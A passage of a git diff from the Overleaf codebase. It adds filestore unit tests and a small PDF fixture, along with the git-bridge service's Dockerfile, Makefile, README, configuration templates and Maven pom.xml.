error = err + done() + }) + }) + + it('should not produce an error', function () { + expect(error).not.to.exist + }) + + it('should log a warning', function () { + expect(this.logger.warn).to.have.been.calledOnce + }) + }) +}) diff --git a/services/filestore/test/unit/js/KeybuilderTests.js b/services/filestore/test/unit/js/KeybuilderTests.js new file mode 100644 index 0000000..96f4d67 --- /dev/null +++ b/services/filestore/test/unit/js/KeybuilderTests.js @@ -0,0 +1,37 @@ +const SandboxedModule = require('sandboxed-module') + +const modulePath = '../../../app/js/KeyBuilder.js' + +describe('KeybuilderTests', function () { + let KeyBuilder + const key = 'wombat/potato' + + beforeEach(function () { + KeyBuilder = SandboxedModule.require(modulePath, { + requires: { '@overleaf/settings': {} }, + }) + }) + + describe('cachedKey', function () { + it('should add the format to the key', function () { + const opts = { format: 'png' } + const newKey = KeyBuilder.addCachingToKey(key, opts) + newKey.should.equal(`${key}-converted-cache/format-png`) + }) + + it('should add the style to the key', function () { + const opts = { style: 'thumbnail' } + const newKey = KeyBuilder.addCachingToKey(key, opts) + newKey.should.equal(`${key}-converted-cache/style-thumbnail`) + }) + + it('should add format first, then style', function () { + const opts = { + style: 'thumbnail', + format: 'png', + } + const newKey = KeyBuilder.addCachingToKey(key, opts) + newKey.should.equal(`${key}-converted-cache/format-png-style-thumbnail`) + }) + }) +}) diff --git a/services/filestore/test/unit/js/LocalFileWriterTests.js b/services/filestore/test/unit/js/LocalFileWriterTests.js new file mode 100644 index 0000000..d5fdb92 --- /dev/null +++ b/services/filestore/test/unit/js/LocalFileWriterTests.js @@ -0,0 +1,111 @@ +const sinon = require('sinon') +const chai = require('chai') +const { expect } = chai +const modulePath = '../../../app/js/LocalFileWriter.js' +const SandboxedModule = require('sandboxed-module') +const { Errors } = require('@overleaf/object-persistor') +chai.use(require('sinon-chai')) + +describe('LocalFileWriter', function () { + const writeStream = 'writeStream' + const readStream = 'readStream' + const settings = { path: { uploadFolder: '/uploads' } } + const fsPath = '/uploads/wombat' + const filename = 'wombat' + let stream, fs, LocalFileWriter + + beforeEach(function () { + fs = { + createWriteStream: sinon.stub().returns(writeStream), + unlink: sinon.stub().yields(), + } + stream = { + pipeline: sinon.stub().yields(), + } + + const ObjectPersistor = { Errors } + + LocalFileWriter = SandboxedModule.require(modulePath, { + requires: { + fs, + stream, + '@overleaf/settings': settings, + '@overleaf/metrics': { + inc: sinon.stub(), + Timer: sinon.stub().returns({ done: sinon.stub() }), + }, + '@overleaf/object-persistor': ObjectPersistor, + }, + }) + }) + + describe('writeStream', function () { + it('writes the stream to the upload folder', function (done) { + LocalFileWriter.writeStream(readStream, filename, (err, path) => { + expect(err).not.to.exist + expect(fs.createWriteStream).to.have.been.calledWith(fsPath) + expect(stream.pipeline).to.have.been.calledWith(readStream, writeStream) + expect(path).to.equal(fsPath) + done() + }) + }) + + describe('when there is an error', function () { + const error = new Error('not enough ketchup') + beforeEach(function () { + stream.pipeline.yields(error) + }) + + it('should wrap the error', function () { + LocalFileWriter.writeStream(readStream, filename, err => { + expect(err).to.exist + expect(err.cause).to.equal(error) + }) + }) + + it('should delete the temporary file', function () { + LocalFileWriter.writeStream(readStream, filename, () => { + expect(fs.unlink).to.have.been.calledWith(fsPath) + }) + }) + }) + }) + + describe('deleteFile', function () { + it('should unlink the file', function (done) { + LocalFileWriter.deleteFile(fsPath, err => { + expect(err).not.to.exist + expect(fs.unlink).to.have.been.calledWith(fsPath) + done() + }) + }) + + it('should not call unlink with an empty path', function (done) { + LocalFileWriter.deleteFile('', err => { + expect(err).not.to.exist + expect(fs.unlink).not.to.have.been.called + done() + }) + }) + + it('should not throw a error if the file does not exist', function (done) { + const error = new Error('file not found') + error.code = 'ENOENT' + fs.unlink = sinon.stub().yields(error) + LocalFileWriter.deleteFile(fsPath, err => { + expect(err).not.to.exist + done() + }) + }) + + it('should wrap the error', function (done) { + const error = new Error('failed to reticulate splines') + fs.unlink = sinon.stub().yields(error) + LocalFileWriter.deleteFile(fsPath, err => { + expect(err).to.exist + expect(err.cause).to.equal(error) + done() + }) + }) + }) +}) diff --git a/services/filestore/test/unit/js/SafeExecTests.js b/services/filestore/test/unit/js/SafeExecTests.js new file mode 100644 index 0000000..169c9fb --- /dev/null +++ b/services/filestore/test/unit/js/SafeExecTests.js @@ -0,0 +1,110 @@ +const chai = require('chai') +const should = chai.should() +const { expect } = chai +const modulePath = '../../../app/js/SafeExec' +const { Errors } = require('@overleaf/object-persistor') +const SandboxedModule = require('sandboxed-module') + +describe('SafeExec', function () { + let settings, options, safeExec + + beforeEach(function () { + settings = { enableConversions: true } + options = { timeout: 10 * 1000, killSignal: 'SIGTERM' } + + const ObjectPersistor = { Errors } + + safeExec = SandboxedModule.require(modulePath, { + globals: { process }, + requires: { + '@overleaf/settings': settings, + '@overleaf/object-persistor': ObjectPersistor, + }, + }) + }) + + describe('safeExec', function () { + it('should execute a valid command', function (done) { + safeExec(['/bin/echo', 'hello'], options, (err, stdout, stderr) => { + stdout.should.equal('hello\n') + stderr.should.equal('') + should.not.exist(err) + done() + }) + }) + + it('should error when conversions are disabled', function (done) { + settings.enableConversions = false + safeExec(['/bin/echo', 'hello'], options, err => { + expect(err).to.exist + done() + }) + }) + + it('should execute a command with non-zero exit status', function (done) { + safeExec(['/usr/bin/env', 'false'], options, err => { + expect(err).to.exist + expect(err.name).to.equal('FailedCommandError') + expect(err.code).to.equal(1) + expect(err.stdout).to.equal('') + expect(err.stderr).to.equal('') + done() + }) + }) + + it('should handle an invalid command', function (done) { + safeExec(['/bin/foobar'], options, err => { + err.code.should.equal('ENOENT') + done() + }) + }) + + it('should handle a command that runs too long', function (done) { + safeExec( + ['/bin/sleep', '10'], + { timeout: 500, killSignal: 'SIGTERM' }, + err => { + expect(err).to.exist + expect(err.name).to.equal('FailedCommandError') + expect(err.code).to.equal('SIGTERM') + done() + } + ) + }) + }) + + describe('as a promise', function () { + beforeEach(function () { + safeExec = safeExec.promises + }) + + it('should execute a valid command', async function () { + const { stdout, stderr } = await safeExec(['/bin/echo', 'hello'], options) + + stdout.should.equal('hello\n') + stderr.should.equal('') + }) + + it('should throw a ConversionsDisabledError when appropriate', async function () { + settings.enableConversions = false + try { + await safeExec(['/bin/echo', 'hello'], options) + } catch (err) { + expect(err.name).to.equal('ConversionsDisabledError') + return + } + expect('method did not throw an error').not.to.exist + }) + + it('should throw a FailedCommandError when appropriate', async function () { + try { + await safeExec(['/usr/bin/env', 'false'], options) + } catch (err) { + expect(err.name).to.equal('FailedCommandError') + expect(err.code).to.equal(1) + return + } + expect('method did not throw an error').not.to.exist + }) + }) +}) diff --git a/services/filestore/test/unit/js/SettingsTests.js b/services/filestore/test/unit/js/SettingsTests.js new file mode 100644 index 0000000..a7092cb --- /dev/null +++ b/services/filestore/test/unit/js/SettingsTests.js @@ -0,0 +1,21 @@ +const chai = require('chai') +const { expect } = chai +const SandboxedModule = require('sandboxed-module') + +describe('Settings', function () { + describe('s3', function () { + it('should use JSONified env var if present', function () { + const s3Settings = { + bucket1: { + auth_key: 'bucket1_key', + auth_secret: 'bucket1_secret', + }, + } + process.env.S3_BUCKET_CREDENTIALS = JSON.stringify(s3Settings) + const settings = SandboxedModule.require('@overleaf/settings', { + globals: { console, process }, + }) + expect(settings.filestore.s3.bucketCreds).to.deep.equal(s3Settings) + }) + }) +}) diff --git a/services/filestore/tiny.pdf b/services/filestore/tiny.pdf new file mode 100644 index 0000000..1c64181 --- /dev/null +++ b/services/filestore/tiny.pdf @@ -0,0 +1,58 @@ +%PDF-1.1 +%¥±ë + +1 0 obj + << /Type /Catalog + /Pages 2 0 R + >> +endobj + +2 0 obj + << /Type /Pages + /Kids [3 0 R] + /Count 1 + /MediaBox [0 0 300 144] + >> +endobj + +3 0 obj + << /Type /Page + /Parent 2 0 R + /Resources + << /Font + << /F1 + << /Type /Font + /Subtype /Type1 + /BaseFont /Times-Roman + >> + >> + >> + /Contents 4 0 R + >> +endobj + +4 0 obj + << /Length 55 >> +stream + BT + /F1 18 Tf + 0 0 Td + (Hello World) Tj + ET +endstream +endobj + +xref +0 5 +0000000000 65535 f +0000000018 00000 n +0000000077 00000 n +0000000178 00000 n +0000000457 00000 n +trailer + << /Root 1 0 R + /Size 5 + >> +startxref +565 +%%EOF diff --git a/services/filestore/tsconfig.json b/services/filestore/tsconfig.json new file mode 100644 index 0000000..d3fdd30 --- /dev/null +++ b/services/filestore/tsconfig.json @@ -0,0 +1,12 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "app.js", + "app/js/**/*", + "benchmarks/**/*", + "config/**/*", + "scripts/**/*", + "test/**/*", + "types" + ] +} diff --git a/services/git-bridge/.gitignore b/services/git-bridge/.gitignore new file mode 100644 index 0000000..74a7f43 --- /dev/null +++ b/services/git-bridge/.gitignore @@ -0,0 +1,53 @@ +# Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio and Webstorm +# Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839 + +# Let's not share anything because we're using Maven. + +.idea +*.iml + +# User-specific stuff: +.idea/workspace.xml +.idea/tasks.xml +.idea/dictionaries +.idea/vcs.xml +.idea/jsLibraryMappings.xml + +# Sensitive or high-churn files: +.idea/dataSources.ids +.idea/dataSources.xml +.idea/dataSources.local.xml +.idea/sqlDataSources.xml +.idea/dynamic.xml +.idea/uiDesigner.xml + +# Gradle: +.idea/gradle.xml +.idea/libraries + +# Mongo Explorer plugin: +.idea/mongoSettings.xml + +## File-based project format: +*.iws + +## Plugin-specific files: + +# IntelliJ +/out/ +target/ + +# mpeltonen/sbt-idea plugin +.idea_modules/ + +# JIRA plugin +atlassian-ide-plugin.xml + +# Crashlytics plugin (for Android Studio and IntelliJ) +com_crashlytics_export_strings.xml +crashlytics.properties +crashlytics-build.properties +fabric.properties + +# Local configuration files +conf/runtime.json diff --git a/services/git-bridge/Dockerfile b/services/git-bridge/Dockerfile new file mode 100644 index 0000000..58572ae --- /dev/null +++ b/services/git-bridge/Dockerfile @@ -0,0 +1,48 @@ +# Dockerfile for git-bridge + +FROM maven:3-amazoncorretto-21-debian AS base + +RUN apt-get update && apt-get install -y make git sqlite3 \ + && rm -rf /var/lib/apt/lists + +COPY vendor/envsubst /opt/envsubst +RUN chmod +x /opt/envsubst + +RUN useradd --create-home node + +FROM base AS builder + +COPY . /app + +WORKDIR /app + +RUN make package \ +# The name of the created jar contains the current version tag. +# Rename it to a static path that can be used for copying. +&& find /app/target \ + -name 'writelatex-git-bridge*jar-with-dependencies.jar' \ + -exec mv {} /git-bridge.jar \; + +FROM amazoncorretto:21-alpine + +RUN apk add --update --no-cache bash git sqlite procps htop net-tools jemalloc util-linux + +ENV LD_PRELOAD=/usr/lib/libjemalloc.so.2 + +RUN adduser -D node + +COPY --from=builder /git-bridge.jar / + +COPY vendor/envsubst /opt/envsubst +RUN chmod +x /opt/envsubst + +COPY conf/envsubst_template.json envsubst_template.json +COPY start.sh start.sh +COPY server-pro-start.sh server-pro-start.sh + +RUN mkdir conf +RUN chown node:node conf + +USER node + +CMD ["/start.sh"] diff --git a/services/git-bridge/LICENSE b/services/git-bridge/LICENSE new file mode 100644 index 0000000..dc6bb13 --- /dev/null +++ b/services/git-bridge/LICENSE @@ -0,0 +1,22 @@ +The MIT License (MIT) + +Copyright (c) 2014 Winston Li + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + diff --git a/services/git-bridge/Makefile b/services/git-bridge/Makefile new file mode 100644 index 0000000..2fd30f0 --- /dev/null +++ b/services/git-bridge/Makefile @@ -0,0 +1,40 @@ +# git-bridge makefile + +MVN_OPTS := --no-transfer-progress +MVN_TARGET := target/writelatex-git-bridge-1.0-SNAPSHOT-jar-with-dependencies.jar + +runtime-conf: + /opt/envsubst < conf/envsubst_template.json > conf/runtime.json + + +run: $(MVN_TARGET) runtime-conf + java $(GIT_BRIDGE_JVM_ARGS) -jar $(MVN_TARGET) conf/runtime.json + + +$(MVN_TARGET): $(shell find src -type f) pom.xml + mvn $(MVN_OPTS) package -DskipTests + +build: $(MVN_TARGET) + + +format: + mvn $(MVN_OPTS) com.spotify.fmt:fmt-maven-plugin:check + + +format_fix: + mvn $(MVN_OPTS) com.spotify.fmt:fmt-maven-plugin:format + + +test: + mvn $(MVN_OPTS) test + + +clean: + mvn $(MVN_OPTS) clean + + +package: clean + mvn $(MVN_OPTS) package -DskipTests + + +.PHONY: run package build clean test runtime-conf diff --git a/services/git-bridge/README.md b/services/git-bridge/README.md new file mode 100644 index 0000000..eadc2ab --- /dev/null +++ b/services/git-bridge/README.md @@ -0,0 +1,136 @@ +# writelatex-git-bridge + +## Docker + +The `Dockerfile` contains all the requirements for building and running the + writelatex-git-bridge. + +```bash +# build the image +docker build -t writelatex-git-bridge . + +# run it with the demo config +docker run -v `pwd`/conf/local.json:/conf/runtime.json writelatex-git-bridge +``` + +## Native install + +### Required packages + + * `maven` (for building, running tests and packaging) + * `jdk-8` (for compiling and running) + +### Commands + +To be run from the base directory: + +**Build jar**: +`mvn package` + +**Run tests**: +`mvn test` + +**Clean**: +`mvn clean` + +To be run from the dev-environment: + +**Build jar**: +`bin/run git-bridge make package` + +**Run tests**: +`bin/run git-bridge make test` + +**Clean**: +`bin/run git-bridge make clean` + +### Installation + +Install dependencies: + +``` +sudo apt-get update +sudo apt-get install -y maven +sudo apt-get install -y openjdk-8-jdk +sudo update-alternatives --set java /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java +sudo update-alternatives --set javac /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/javac +``` + +Create a config file according to the format below. + +Run `mvn package` to build, test, and package it into a jar at `target/writelatex-git-bridge-1.0-SNAPSHOT-jar-with-dependencies.jar`. + +Use `java -jar <path_to_jar> <path_to_config_file>` to run the server. + +## Runtime Configuration + +The configuration file is in `.json` format. + + { + "port" (int): the port number, + "rootGitDirectory" (string): the directory in which to store + git repos and the db/atts, + "apiBaseUrl" (string): base url for the snapshot api, + "username" (string, optional): username for http basic auth, + "password" (string, optional): password for http basic auth, + "postbackBaseUrl" (string): the postback url, + "serviceName" (string): current name of writeLaTeX + in case it ever changes, + "oauth2Server" (string): oauth2 server, + with protocol and + without trailing slash, + null or missing if oauth2 shouldn't be used + }, + "repoStore" (object, optional): { configure the repo store + "maxFileSize" (long, optional): maximum size of a file, inclusive + }, + "swapStore" (object, optional): { the place to swap projects to. + if null, type defaults to + "noop" + "type" (string): "s3", "memory", "noop" (not recommended), + "awsAccessKey" (string, optional): only for s3, + "awsSecret" (string, optional): only for s3, + "s3BucketName" (string, optional): only for s3 + }, + "swapJob" (object, optional): { configure the project + swapping job. + if null, defaults to no-op + "minProjects" (int64): lower bound on number of projects + present. The swap job will never go + below this, regardless of what the + watermark shows. Regardless, if + minProjects prevents an eviction, + the swap job will WARN, + "lowGiB" (int32): the low watermark for swapping, + i.e. swap until disk usage is below this, + "highGiB" (int32): the high watermark for swapping, + i.e. start swapping when + disk usage becomes this, + "intervalMillis" (int64): amount of time in between running + swap job and checking watermarks. + 3600000 is 1 hour + } + } + +You have to restart the server for configuration changes to take effect. + + +## Creating OAuth app + +In dev-env, run the following command in mongo to create the oauth application +for git-bridge. + +``` +db.oauthApplications.insert({ + "clientSecret" : "v1.G5HHTXfxsJMmfFhSar9QhJLg/u4KpGpYOdPGwoKdZXk=", + "grants" : [ + "password" + ], + "id" : "264c723c925c13590880751f861f13084934030c13b4452901e73bdfab226edc", + "name" : "Overleaf Git Bridge", + "redirectUris" : [], + "scopes" : [ + "git_bridge" + ] +}) +``` diff --git a/services/git-bridge/conf/envsubst_template.json b/services/git-bridge/conf/envsubst_template.json new file mode 100644 index 0000000..4ede5ba --- /dev/null +++ b/services/git-bridge/conf/envsubst_template.json @@ -0,0 +1,31 @@ +{ + "port": ${GIT_BRIDGE_PORT:-8000}, + "bindIp": "${GIT_BRIDGE_BIND_IP:-0.0.0.0}", + "idleTimeout": ${GIT_BRIDGE_IDLE_TIMEOUT:-30000}, + "rootGitDirectory": "${GIT_BRIDGE_ROOT_DIR:-/tmp/wlgb}", + "allowedCorsOrigins": "${GIT_BRIDGE_ALLOWED_CORS_ORIGINS:-https://localhost}", + "apiBaseUrl": "${GIT_BRIDGE_API_BASE_URL:-https://localhost/api/v0}", + "postbackBaseUrl": "${GIT_BRIDGE_POSTBACK_BASE_URL:-https://localhost}", + "serviceName": "${GIT_BRIDGE_SERVICE_NAME:-Overleaf}", + "oauth2Server": "${GIT_BRIDGE_OAUTH2_SERVER:-https://localhost}", + "userPasswordEnabled": ${GIT_BRIDGE_USER_PASSWORD_ENABLED:-false}, + "repoStore": { + "maxFileNum": ${GIT_BRIDGE_REPOSTORE_MAX_FILE_NUM:-2000}, + "maxFileSize": ${GIT_BRIDGE_REPOSTORE_MAX_FILE_SIZE:-52428800} + }, + "swapStore": { + "type": "${GIT_BRIDGE_SWAPSTORE_TYPE:-noop}", + "awsAccessKey": "${GIT_BRIDGE_SWAPSTORE_AWS_ACCESS_KEY}", + "awsSecret": "${GIT_BRIDGE_SWAPSTORE_AWS_SECRET}", + "s3BucketName": "${GIT_BRIDGE_SWAPSTORE_S3_BUCKET_NAME}", + "awsRegion": "${GIT_BRIDGE_SWAPSTORE_AWS_REGION:-us-east-1}" + }, + "swapJob": { + "minProjects": ${GIT_BRIDGE_SWAPJOB_MIN_PROJECTS:-50}, + "lowGiB": ${GIT_BRIDGE_SWAPJOB_LOW_GIB:-128}, + "highGiB": ${GIT_BRIDGE_SWAPJOB_HIGH_GIB:-256}, + "intervalMillis": ${GIT_BRIDGE_SWAPJOB_INTERVAL_MILLIS:-3600000}, + "compressionMethod": "${GIT_BRIDGE_SWAPJOB_COMPRESSION_METHOD:-gzip}" + }, + "sqliteHeapLimitBytes": ${GIT_BRIDGE_SQLITE_HEAP_LIMIT_BYTES:-0} +} diff --git a/services/git-bridge/conf/example_config.json b/services/git-bridge/conf/example_config.json new file mode 100644 index 0000000..76b82eb --- /dev/null +++ b/services/git-bridge/conf/example_config.json @@ -0,0 +1,30 @@ +{ + "port": 8080, + "bindIp": "127.0.0.1", + "idleTimeout": 30000, + "rootGitDirectory": "/tmp/wlgb", + "allowedCorsOrigins": "https://localhost", + "apiBaseUrl": "https://localhost/api/v0", + "postbackBaseUrl": "https://localhost", + "serviceName": "Overleaf", + "oauth2Server": "https://localhost", + "repoStore": { + "maxFileNum": 2000, + "maxFileSize": 52428800 + }, + "swapStore": { + "type": "s3", + "awsAccessKey": "asdf", + "awsSecret": "asdf", + "s3BucketName": "com.overleaf.testbucket", + "awsRegion": "us-east-1" + }, + "swapJob": { + "minProjects": 50, + "lowGiB": 128, + "highGiB": 256, + "intervalMillis": 3600000, + "compressionMethod": "gzip" + }, + "sqliteHeapLimitBytes": 512000000 +} diff --git a/services/git-bridge/conf/local.json b/services/git-bridge/conf/local.json new file mode 100644 index 0000000..c4de48d --- /dev/null +++ b/services/git-bridge/conf/local.json @@ -0,0 +1,25 @@ +{ + "port": 8000, + "bindIp": "0.0.0.0", + "idleTimeout": 30000, + "rootGitDirectory": "/tmp/wlgb", + "allowedCorsOrigins": "http://v2.overleaf.test", + "apiBaseUrl": "http://v2.overleaf.test:3000/api/v0", + "postbackBaseUrl": "http://git-bridge:8000", + "serviceName": "Overleaf", + "oauth2Server": "http://v2.overleaf.test:3000", + "repoStore": { + "maxFileNum": 2000, + "maxFileSize": 52428800 + }, + "swapStore": { + "type": "noop" + }, + "swapJob": { + "minProjects": 50, + "lowGiB": 128, + "highGiB": 256, + "intervalMillis": 3600000, + "compressionMethod": "gzip" + } +} diff --git a/services/git-bridge/pom.xml b/services/git-bridge/pom.xml new file mode 100644 index 0000000..7b2c5b8 --- /dev/null +++ b/services/git-bridge/pom.xml @@ -0,0 +1,275 @@ +<?xml version="1.0" encoding="UTF-8"?> +<project xmlns="http://maven.apache.org/POM/4.0.0" + xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> + <modelVersion>4.0.0</modelVersion> + + <groupId>uk.ac.ic.wlgitbridge</groupId> + <artifactId>writelatex-git-bridge</artifactId> + <version>1.0-SNAPSHOT</version> + <properties> + <java.version>21</java.version> + <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding> + <maven.compiler.plugin.version>3.13.0</maven.compiler.plugin.version> + <maven.surefire.plugin.version>2.12.4</maven.surefire.plugin.version> + <maven.assembly.plugin.version>3.1.0</maven.assembly.plugin.version> + <fmt.plugin.version>2.23</fmt.plugin.version> + <junit.version>4.13.2</junit.version> + <jmock.junit4.version>2.8.4</jmock.junit4.version> + <jetty.servlet.version>9.4.57.v20241219</jetty.servlet.version> + <gson.version>2.9.0</gson.version> + <async.http.client.version>3.0.1</async.http.client.version> + <jgit.version>6.6.1.202309021850-r</jgit.version> + <sqlite.jdbc.version>3.41.2.2</sqlite.jdbc.version> + <joda.time.version>2.9.9</joda.time.version> + <google.oauth.client.version>1.37.0</google.oauth.client.version> + <google.http.client.version>1.23.0</google.http.client.version> + <commons.lang3.version>3.17.0</commons.lang3.version> + <logback.classic.version>1.2.13</logback.classic.version> + <mockserver.version>5.12.0</mockserver.version> + <mockito.version>5.12.0</mockito.version> + <aws.java.sdk.version>1.12.780</aws.java.sdk.version> + <jakarta.xml.bind.api.version>${jaxb.runtime.version}</jakarta.xml.bind.api.version> + <jaxb.runtime.version>2.3.2</jaxb.runtime.version> + <httpclient.version>4.5.14</httpclient.version> + <commons.io.version>2.18.0</commons.io.version> + <commons.compress.version>1.27.1</commons.compress.version> + <simpleclient.version>0.10.0</simpleclient.version> + <bouncycastle.crypto.version>1.70</bouncycastle.crypto.version> + </properties> + <build> + <plugins> + <!-- https://mvnrepository.com/artifact/org.apache.maven.plugins/maven-compiler-plugin --> + <plugin> + <artifactId>maven-compiler-plugin</artifactId> + <version>${maven.compiler.plugin.version}</version> + <configuration> + <source>${java.version}</source> + <target>${java.version}</target> + <release>${java.version}</release> + </configuration> + </plugin> + <!-- Workaround, test loader crashes without this configuration option --> + <!-- See: https://stackoverflow.com/questions/53010200/maven-surefire-could-not-find-forkedbooter-class --> + <plugin> + <groupId>org.apache.maven.plugins</groupId> + <artifactId>maven-surefire-plugin</artifactId> + <version>${maven.surefire.plugin.version}</version> + <configuration> + <argLine>-Djdk.net.URLClassPath.disableClassPathURLCheck=true</argLine> + </configuration> + </plugin> + <!-- https://mvnrepository.com/artifact/org.apache.maven.plugins/maven-assembly-plugin --> + <plugin> + <artifactId>maven-assembly-plugin</artifactId> + <version>${maven.assembly.plugin.version}</version> + <executions> + <execution> + <phase>package</phase> + <goals> + <goal>single</goal> + </goals> + </execution> + </executions> + <configuration> + <archive> + <manifest> + <mainClass>uk.ac.ic.wlgitbridge.Main</mainClass> + </manifest> + </archive> + <descriptorRefs> + <descriptorRef>jar-with-dependencies</descriptorRef> + </descriptorRefs> + </configuration> + </plugin> + <plugin> + <groupId>com.spotify.fmt</groupId> + <artifactId>fmt-maven-plugin</artifactId> + <version>${fmt.plugin.version}</version> + </plugin> + </plugins> + </build> + <dependencies> + <!-- https://mvnrepository.com/artifact/junit/junit --> + <dependency> + <groupId>junit</groupId> + <artifactId>junit</artifactId> + <version>${junit.version}</version> + <scope>test</scope> + </dependency> + <!-- https://mvnrepository.com/artifact/org.jmock/jmock-junit4 --> + <dependency> + <groupId>org.jmock</groupId> + <artifactId>jmock-junit4</artifactId> + <version>${jmock.junit4.version}</version> + <scope>test</scope> + </dependency> + <!-- https://mvnrepository.com/artifact/org.eclipse.jetty/jetty-servlet --> + <dependency> + <groupId>org.eclipse.jetty</groupId> + <artifactId>jetty-servlet</artifactId> + <version>${jetty.servlet.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/org.eclipse.jetty/jetty-server --> + <dependency> + <groupId>org.eclipse.jetty</groupId> + <artifactId>jetty-server</artifactId> + <version>${jetty.servlet.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/com.google.code.gson/gson --> + <dependency> + <groupId>com.google.code.gson</groupId> + <artifactId>gson</artifactId> + <version>${gson.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/org.asynchttpclient/async-http-client --> + <dependency> + <groupId>org.asynchttpclient</groupId> + <artifactId>async-http-client</artifactId> + <version>${async.http.client.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/org.eclipse.jgit/org.eclipse.jgit --> + <dependency> + <groupId>org.eclipse.jgit</groupId> + <artifactId>org.eclipse.jgit</artifactId> + <version>${jgit.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/org.eclipse.jgit/org.eclipse.jgit.http.server --> + <dependency> + <groupId>org.eclipse.jgit</groupId> + <artifactId>org.eclipse.jgit.http.server</artifactId> + <version>${jgit.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/org.xerial/sqlite-jdbc --> + <dependency> + <groupId>org.xerial</groupId> + <artifactId>sqlite-jdbc</artifactId> + <version>${sqlite.jdbc.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/joda-time/joda-time --> + <dependency> + <groupId>joda-time</groupId> + <artifactId>joda-time</artifactId> + <version>${joda.time.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/com.google.oauth-client/google-oauth-client --> + <dependency> + <groupId>com.google.oauth-client</groupId> + <artifactId>google-oauth-client</artifactId> + <version>${google.oauth.client.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/com.google.http-client/google-http-client --> + <dependency> + <groupId>com.google.http-client</groupId> + <artifactId>google-http-client</artifactId> + <version>${google.http.client.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/com.google.http-client/google-http-client-gson --> + <dependency> + <groupId>com.google.http-client</groupId> + <artifactId>google-http-client-gson</artifactId> + <version>${google.http.client.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/org.apache.commons/commons-lang3 --> + <dependency> + <groupId>org.apache.commons</groupId> + <artifactId>commons-lang3</artifactId> + <version>${commons.lang3.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/ch.qos.logback/logback-classic --> + <dependency> + <groupId>ch.qos.logback</groupId> + <artifactId>logback-classic</artifactId> + <version>${logback.classic.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/org.mock-server/mockserver-netty --> + <dependency> + <groupId>org.mock-server</groupId> + <artifactId>mockserver-netty</artifactId> + <version>${mockserver.version}</version> + <scope>test</scope> + </dependency> + <!-- https://mvnrepository.com/artifact/org.mock-server/mockserver-junit-rule --> + <dependency> + <groupId>org.mock-server</groupId> + <artifactId>mockserver-junit-rule</artifactId> + <version>${mockserver.version}</version> + <scope>test</scope> + </dependency> + <!-- https://mvnrepository.com/artifact/org.mockito/mockito-core --> + <dependency> + <groupId>org.mockito</groupId> + <artifactId>mockito-core</artifactId> + <version>${mockito.version}</version> + <scope>test</scope> + </dependency> + <!-- https://mvnrepository.com/artifact/com.amazonaws/aws-java-sdk --> + <dependency> + <groupId>com.amazonaws</groupId> + <artifactId>aws-java-sdk-s3</artifactId> + <version>${aws.java.sdk.version}</version> + </dependency> + <!-- API, java.xml.bind module --> + <dependency> + <groupId>jakarta.xml.bind</groupId> + <artifactId>jakarta.xml.bind-api</artifactId> + <version>${jakarta.xml.bind.api.version}</version> + </dependency> + + <!-- Runtime, com.sun.xml.bind module --> + <dependency> + <groupId>org.glassfish.jaxb</groupId> + <artifactId>jaxb-runtime</artifactId> + <version>${jaxb.runtime.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/org.apache.httpcomponents/httpclient --> + <dependency> + <groupId>org.apache.httpcomponents</groupId> + <artifactId>httpclient</artifactId> + <version>${httpclient.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/commons-io/commons-io --> + <dependency> + <groupId>commons-io</groupId> + <artifactId>commons-io</artifactId> + <version>${commons.io.version}</version> + </dependency> + <!-- https://mvnrepository.com/artifact/org.apache.commons/commons-compress --> + <dependency> + <groupId>org.apache.commons</groupId> + <artifactId>commons-compress</artifactId> + <version>${commons.compress.version}</version> + </dependency> + <!-- prometheus metrics --> + <dependency> + <groupId>io.prometheus</groupId> + <artifactId>simpleclient</artifactId> + <version>${simpleclient.version}</version> + </dependency> + <!-- Hotspot JVM metrics --> + <dependency> + <groupId>io.prometheus</groupId> + <artifactId>simpleclient_hotspot</artifactId> + <version>${simpleclient.version}</version> + </dependency> + <!-- Expose metrics via a servlet --> + <dependency> + <groupId>io.prometheus</groupId> + <artifactId>simpleclient_servlet</artifactId> + <version>${simpleclient.version}</version> + </dependency> + <!-- Require by MockServerClient to load 'sun.security.x509' / 'sun.security.util' --> + <dependency> + <groupId>org.bouncycastle</groupId> + <artifactId>bcprov-jdk15on</artifactId> + <version>${bouncycastle.crypto.version}</version> + <scope>test</scope> + </dependency> + 